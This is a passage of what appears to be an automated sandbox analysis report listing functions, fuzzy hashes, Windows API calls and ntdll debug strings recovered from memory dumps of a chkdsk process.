                                                                                                                • Opcode ID: 1788a7c6e2e5b9c70eb07c57c9e908be57128d1d4545857041f7589371aba70c
                                                                                                                • Instruction ID: 6c98092aab24467d7201406b7a3cd0f37501a282267f8443bf7c57886b2bb8e1
                                                                                                                • Opcode Fuzzy Hash: 1788a7c6e2e5b9c70eb07c57c9e908be57128d1d4545857041f7589371aba70c
                                                                                                                • Instruction Fuzzy Hash: 68E0C276750A082BEB20EAA0AC06FAB33946B50A50F050074FC0BEB3C3E610C0024620
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • SetErrorMode.KERNELBASE(00008003,?,05048D14,?), ref: 0504F6EB
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.4088910124.0000000005040000.00000040.80000000.00040000.00000000.sdmp, Offset: 05040000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_5040000_chkdsk.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: ErrorMode
                                                                                                                • String ID:
                                                                                                                • API String ID: 2340568224-0
                                                                                                                • Opcode ID: a2d4a72b799ecba535e6209a82b178d001bd83fc2549ccaf7422d872a4b8c7e9
                                                                                                                • Instruction ID: b9ff7c66fc956cfebc71b0ba1e3e34ac1ff32881bf9ec3d12f919a3c19fcbf58
                                                                                                                • Opcode Fuzzy Hash: a2d4a72b799ecba535e6209a82b178d001bd83fc2549ccaf7422d872a4b8c7e9
                                                                                                                • Instruction Fuzzy Hash: 08D0A7767503043BEB10FEA4AC07F6B33CC6B54A10F490074F949D73C3D954E0004565
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.4090341330.00000000058D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 058D0000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.4090341330.00000000059F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.4090341330.00000000059FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.4090341330.0000000005A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_58d0000_chkdsk.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: e02e9153333db289c80ba7930508421ec0487f7cf63fa8b8d4f1b97d7c8c4ee7
                                                                                                                • Instruction ID: 89466a6fc67e90aa9a9ddab81b802444b675a93030dc9ba36905aceb348df093
                                                                                                                • Opcode Fuzzy Hash: e02e9153333db289c80ba7930508421ec0487f7cf63fa8b8d4f1b97d7c8c4ee7
                                                                                                                • Instruction Fuzzy Hash: 42B09B729015C5C5DE11E760460CF27795577D0711F65C061F2030641E4778C5D1EB75
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.4090341330.00000000058D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 058D0000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.4090341330.00000000059F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.4090341330.00000000059FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.4090341330.0000000005A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_58d0000_chkdsk.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ___swprintf_l
                                                                                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                • API String ID: 48624451-2108815105
                                                                                                                • Opcode ID: d89bfabf1c58e013a8ec61a1a072a15022872b666b32f497aa474da1c67b7420
                                                                                                                • Instruction ID: f24f92cd5422d25e078faac4eff78de6580a3631ba1221f105bf4070753644a3
                                                                                                                • Opcode Fuzzy Hash: d89bfabf1c58e013a8ec61a1a072a15022872b666b32f497aa474da1c67b7420
                                                                                                                • Instruction Fuzzy Hash: 4C51C9B5A04116BFCF20DFA88990D7EFBF9BB48200B54856AF455D7641E734DE50CBA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.4090341330.00000000058D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 058D0000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.4090341330.00000000059F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.4090341330.00000000059FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.4090341330.0000000005A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_58d0000_chkdsk.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ___swprintf_l
                                                                                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                • API String ID: 48624451-2108815105
                                                                                                                • Opcode ID: 7274bb1fc89bb134edf049451b83d0004a3f728e1e23ab05d45f92e14b2d1d4e
                                                                                                                • Instruction ID: d1f9471594b12b41b2efa04ed8d432283ec95cecd9874b97748cc365afb1adb9
                                                                                                                • Opcode Fuzzy Hash: 7274bb1fc89bb134edf049451b83d0004a3f728e1e23ab05d45f92e14b2d1d4e
                                                                                                                • Instruction Fuzzy Hash: 0F510879700645AEFF24DF5CCA909BFB7FEEB48200B008869E596C7641DAF4EA408760
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Strings
                                                                                                                • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 05974742
                                                                                                                • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 05974655
                                                                                                                • ExecuteOptions, xrefs: 059746A0
                                                                                                                • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 059746FC
                                                                                                                • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 05974725
                                                                                                                • Execute=1, xrefs: 05974713
                                                                                                                • CLIENT(ntdll): Processing section info %ws..., xrefs: 05974787
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.4090341330.00000000058D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 058D0000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.4090341330.00000000059F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.4090341330.00000000059FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.4090341330.0000000005A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_58d0000_chkdsk.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                • API String ID: 0-484625025
                                                                                                                • Opcode ID: 8a2b85aad4add2d5e67d85dbeec7cb3cc74e02960d85ad2351a5389c3f2dc253
                                                                                                                • Instruction ID: 5e1e9e539263b126b25fac296b09f05d285f322a2999146b0cb8fa21266d6478
                                                                                                                • Opcode Fuzzy Hash: 8a2b85aad4add2d5e67d85dbeec7cb3cc74e02960d85ad2351a5389c3f2dc253
                                                                                                                • Instruction Fuzzy Hash: AC51F4B5700219BADF10EBA4DC9AFBA77A9FB45304F0404A9E506A7181EB71AF41CF51
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.4090341330.00000000058D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 058D0000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.4090341330.00000000059F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.4090341330.00000000059FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.4090341330.0000000005A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_58d0000_chkdsk.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                                                                                • Instruction ID: 7b7e87c8b1d708e512718d66e0e13f176f843a698a1c1e97d767f3c2cd40543c
                                                                                                                • Opcode Fuzzy Hash: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                                                                                • Instruction Fuzzy Hash: D602F471608341AFC305CF68C994E6AFBE9FFC8744F14892DB9894B264DB35E905CB62
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.4090341330.00000000058D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 058D0000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.4090341330.00000000059F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.4090341330.00000000059FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.4090341330.0000000005A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_58d0000_chkdsk.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __aulldvrm
                                                                                                                • String ID: +$-$0$0
                                                                                                                • API String ID: 1302938615-699404926
                                                                                                                • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                                • Instruction ID: abbfb9201b0c0b958ad72fdedb827b0ba228daf6182df601644b7d62a95f5321
                                                                                                                • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                                • Instruction Fuzzy Hash: EC818F70E092499ADF28CF68C891FFEBBABBF45320F184659D892A7691C634DC418F54
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.4090341330.00000000058D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 058D0000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.4090341330.00000000059F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.4090341330.00000000059FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.4090341330.0000000005A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_58d0000_chkdsk.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ___swprintf_l
                                                                                                                • String ID: %%%u$[$]:%u
                                                                                                                • API String ID: 48624451-2819853543
                                                                                                                • Opcode ID: 01e3b936b124fe9c910bf6f4e2905f069219ec8faf65763874386b0791befac4
                                                                                                                • Instruction ID: 6f2e4d9be3e4176f908ebc2d1a5819f82df404b90b109b9a614f2e47c099666c
                                                                                                                • Opcode Fuzzy Hash: 01e3b936b124fe9c910bf6f4e2905f069219ec8faf65763874386b0791befac4
                                                                                                                • Instruction Fuzzy Hash: 7021337AA04119ABEF10DF79DA44AFEB7EDEF54654F440126E915D3200EB70A9028BA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Strings
                                                                                                                • RTL: Re-Waiting, xrefs: 0597031E
                                                                                                                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 059702E7
                                                                                                                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 059702BD
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.4090341330.00000000058D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 058D0000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.4090341330.00000000059F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.4090341330.00000000059FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.4090341330.0000000005A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_58d0000_chkdsk.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                • API String ID: 0-2474120054
                                                                                                                • Opcode ID: a887511e6996cb9b65a9f49ee320dfe19586c90f597e87c76c0536eb1e79e5d2
                                                                                                                • Instruction ID: cbd9e7809da39d4cf6ded52d7f65e8a63b46c4ed5188eecbe35e27860e5633bf
                                                                                                                • Opcode Fuzzy Hash: a887511e6996cb9b65a9f49ee320dfe19586c90f597e87c76c0536eb1e79e5d2
                                                                                                                • Instruction Fuzzy Hash: C6E1BD316087459FD725CF28C889B2AB7F5FB84724F144A6EF5A68B2E0D774E844CB42
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Strings
                                                                                                                • RTL: Re-Waiting, xrefs: 05977BAC
                                                                                                                • RTL: Resource at %p, xrefs: 05977B8E
                                                                                                                • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 05977B7F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.4090341330.00000000058D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 058D0000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.4090341330.00000000059F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.4090341330.00000000059FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.4090341330.0000000005A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_58d0000_chkdsk.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                • API String ID: 0-871070163
                                                                                                                • Opcode ID: 25b3a2616d0e074f2080254784d3d083c18fe94b7f8914870953e24e52cc4943
                                                                                                                • Instruction ID: 8431ce644bdf82abe5f93e069ed9701f32730941f9681e6488a388312c3e42aa
                                                                                                                • Opcode Fuzzy Hash: 25b3a2616d0e074f2080254784d3d083c18fe94b7f8914870953e24e52cc4943
                                                                                                                • Instruction Fuzzy Hash: 0D41B3313047069BC724EE29C841F6AB7EAFB85720F100A1DE95AD7680D731E805CB91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0597728C
                                                                                                                Strings
                                                                                                                • RTL: Re-Waiting, xrefs: 059772C1
                                                                                                                • RTL: Resource at %p, xrefs: 059772A3
                                                                                                                • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 05977294
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.4090341330.00000000058D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 058D0000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.4090341330.00000000059F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.4090341330.00000000059FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.4090341330.0000000005A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_58d0000_chkdsk.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                • API String ID: 885266447-605551621
                                                                                                                • Opcode ID: 8e1977904f835cea3986c73787a6c2f6ba0c606b938709cdc2b9ed434889d7fe
                                                                                                                • Instruction ID: 3faffdf27c026c7ad38435a25ac2cc5fbb15294487ab1158c9fb5f0311266359
                                                                                                                • Opcode Fuzzy Hash: 8e1977904f835cea3986c73787a6c2f6ba0c606b938709cdc2b9ed434889d7fe
                                                                                                                • Instruction Fuzzy Hash: 8941B13170420AABD721DF65CC45F6AB7A6FB85720F100A19F965DB240DB31F852CBD5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.4090341330.00000000058D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 058D0000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.4090341330.00000000059F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.4090341330.00000000059FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.4090341330.0000000005A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_58d0000_chkdsk.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ___swprintf_l
                                                                                                                • String ID: %%%u$]:%u
                                                                                                                • API String ID: 48624451-3050659472
                                                                                                                • Opcode ID: 61644cf26f95b9cf09e23900d0db8edf0e5ae42ace27aa4254ad873b63d9f0ad
                                                                                                                • Instruction ID: 2f73f7f22fe72ae4d6fe794e727e4f528cc6eee7dd0c546e00319dab4eecd954
                                                                                                                • Opcode Fuzzy Hash: 61644cf26f95b9cf09e23900d0db8edf0e5ae42ace27aa4254ad873b63d9f0ad
                                                                                                                • Instruction Fuzzy Hash: 4F318476A00219AFEF20DF29DD45BEEB7FCFB44610F440556E849E3200EB70AA458FA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.4090341330.00000000058D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 058D0000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.4090341330.00000000059F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.4090341330.00000000059FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.4090341330.0000000005A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_58d0000_chkdsk.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __aulldvrm
                                                                                                                • String ID: +$-
                                                                                                                • API String ID: 1302938615-2137968064
                                                                                                                • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                                • Instruction ID: d769d8b7a80bcf0b2a729fadf9c44be9f2fed47be94ccaa81d95c02895ac1fc6
                                                                                                                • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                                • Instruction Fuzzy Hash: 6D919470E0421E9ADB24DFA9C890EBFB7AAFF44320F54865AE855A72D0D7309D438F50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.4090341330.00000000058D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 058D0000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.4090341330.00000000059F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.4090341330.00000000059FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.4090341330.0000000005A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_58d0000_chkdsk.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: $$@
                                                                                                                • API String ID: 0-1194432280
                                                                                                                • Opcode ID: abc7850b12d4ec00aaf9a2cb8e5c68baff3ffc4987772844a928f5e1f9817503
                                                                                                                • Instruction ID: c1544037c2db4d7fb9149822e8d66fe75b165157a3fb62b01630e9fb891b01d2
                                                                                                                • Opcode Fuzzy Hash: abc7850b12d4ec00aaf9a2cb8e5c68baff3ffc4987772844a928f5e1f9817503
                                                                                                                • Instruction Fuzzy Hash: 94812A75E052699FDB31CB54CD45BEAB7B8AF48750F0045EAE90AB7280D7309E84CFA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%